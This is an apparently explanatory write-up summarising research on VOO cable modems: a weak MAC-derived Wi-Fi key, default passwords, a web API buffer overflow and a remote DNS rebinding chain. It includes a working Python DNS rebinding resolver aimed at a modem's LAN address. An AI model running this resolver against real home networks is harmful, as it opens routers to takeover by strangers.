VOO is an internet provider in Belgium. It ships two different cable modems to customers: one made by Netgear and one made by Technicolor.
In order to understand the device, the researcher decided to reverse engineer the firmware. After connecting to a UART interface, a CM (cable modem) console popped open. Although this was not a root shell, there is a handy tool that can dump the firmware by running commands in the CM console. It took a few tries to get the configuration just right, though.
After reverse engineering the recovered firmware, the author discovered that the Wi-Fi pre-shared key (PSK) is generated by a weak algorithm from the device's MAC address. Since the MAC address is broadcast by the access point, anyone in range can compute the PSK and join the wireless network.
Additionally, several interfaces (web, SSH and SMB) all ship with default passwords that users are unlikely to ever change. There is also a buffer overflow in several of the web API commands. Because this is an embedded modem, the binaries are probably built without the usual protections (stack canaries, NX, ASLR), which makes the overflow easy to exploit.
So far the compromise requires being within Wi-Fi range of the modem. But can this be done remotely? Because the web admin portal is only reachable from the LAN, this did not seem possible at first. However, the author cooked up something good.
The trick is a DNS rebinding attack launched from a malicious website. The attacker's domain first resolves to the attacker's server, so the victim's browser loads the malicious page from there; the DNS answer carries a very short TTL, so the next lookup of the same name returns the modem's LAN address instead. The browser still considers the page and the modem to be the same origin, so the Same-Origin Policy no longer stops the page's JavaScript from talking to the modem's web interface. From there the script logs in with the default credentials (the weak PSK is not needed for this path, since the victim's browser is already on the LAN) and triggers the buffer overflow in the web API to pop a shell.
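To make the rebinding step concrete, here is the resolver side of the attack as an added example; it is not code from the original article or from the author's toolkit. The names and addresses are assumptions: the attacker controls `rebind.example`, serves the malicious page from `203.0.113.10`, and the modem's LAN address is `192.168.0.1`. The first A answer a client receives points at the attacker's server with TTL 0; every later lookup from the same client points at the modem, while the browser's notion of the origin stays `rebind.example`.

```python
"""Minimal DNS rebinding resolver (added example, not from the original article).

Hypothetical values: ATTACKER_IP hosts the malicious page, MODEM_IP is the
modem's LAN address, REBIND_DOMAIN is the attacker-controlled name.
"""
import socket
import struct

ATTACKER_IP = "203.0.113.10"   # hypothetical public host serving the malicious page
MODEM_IP = "192.168.0.1"       # hypothetical LAN address of the cable modem
REBIND_DOMAIN = "rebind.example"
QTYPE_A = 1


def parse_query(packet: bytes):
    """Return (txid, qname, qtype, raw_question) from a single-question DNS query."""
    txid, _flags, qdcount = struct.unpack("!HHH", packet[:6])
    if qdcount != 1:
        raise ValueError("expected exactly one question")
    pos = 12                      # question section starts after the 12-byte header
    labels = []
    while True:
        length = packet[pos]
        pos += 1
        if length == 0:
            break
        labels.append(packet[pos:pos + length].decode("ascii"))
        pos += length
    qtype, _qclass = struct.unpack("!HH", packet[pos:pos + 4])
    pos += 4
    return txid, ".".join(labels), qtype, packet[12:pos]


def build_query(txid: int, name: str) -> bytes:
    """Encode a standard A query for `name` (used to construct sample input)."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    qname = b"".join(bytes([len(l)]) + l.encode("ascii") for l in name.split(".")) + b"\x00"
    return header + qname + struct.pack("!HH", QTYPE_A, 1)


def build_answer(txid: int, question: bytes, ip: str, ttl: int) -> bytes:
    """Standard response with one A record; 0xC00C is a pointer to the qname at offset 12."""
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)
    rr = struct.pack("!HHHIH", 0xC00C, QTYPE_A, 1, ttl, 4) + socket.inet_aton(ip)
    return header + question + rr


def build_nxdomain(txid: int, question: bytes) -> bytes:
    """Response with RCODE=3 (NXDOMAIN) for names we do not serve."""
    return struct.pack("!HHHHHH", txid, 0x8183, 1, 0, 0, 0) + question


def answered_ip(response: bytes) -> str:
    """Extract the A record data from a response produced by build_answer."""
    return socket.inet_ntoa(response[-4:])


def answered_ttl(response: bytes) -> int:
    """Extract the TTL of the single A record (4 bytes before rdlength + rdata)."""
    return struct.unpack("!I", response[-10:-6])[0]


class RebindResolver:
    """Answers the first lookup per client with the attacker's IP, then the modem's IP."""

    def __init__(self, attacker_ip=ATTACKER_IP, target_ip=MODEM_IP, domain=REBIND_DOMAIN):
        self.attacker_ip = attacker_ip
        self.target_ip = target_ip
        self.domain = domain
        self.lookups = {}         # client address -> number of A queries answered

    def answer(self, client: str, packet: bytes) -> bytes:
        txid, qname, qtype, question = parse_query(packet)
        if qname.lower() != self.domain or qtype != QTYPE_A:
            return build_nxdomain(txid, question)
        n = self.lookups.get(client, 0)
        self.lookups[client] = n + 1
        ip = self.attacker_ip if n == 0 else self.target_ip
        # TTL 0 asks the browser/OS not to cache, so the rebind happens on the next lookup.
        return build_answer(txid, question, ip, ttl=0)


def simulate(client: str = "198.51.100.7", lookups: int = 3):
    """Show what one client sees across consecutive lookups (constructed input)."""
    resolver = RebindResolver()
    return [answered_ip(resolver.answer(client, build_query(0x1000 + i, REBIND_DOMAIN)))
            for i in range(lookups)]


def serve(bind_addr=("0.0.0.0", 53)):
    """Run the resolver over UDP (needs privileges for port 53; not exercised offline)."""
    resolver = RebindResolver()
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.bind(bind_addr)
    while True:
        packet, (client, _port) = sock.recvfrom(512)
        sock.sendto(resolver.answer(client, packet), (client, _port))


if __name__ == "__main__":
    print(simulate())   # first answer is the attacker, the rest are the modem
```

Two practical caveats follow from how origins work. The malicious page has to be served on the same port as the modem's web interface, because the origin includes the port; and any device that validates the `Host` header against its own address or hostname would reject the rebound requests, which is the simplest server-side defence against this class of attack.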
Overall, the article is a little long for the number of bugs (three or so) it covers. But the use of DNS rebinding and the attack on the PSK derivation were interesting.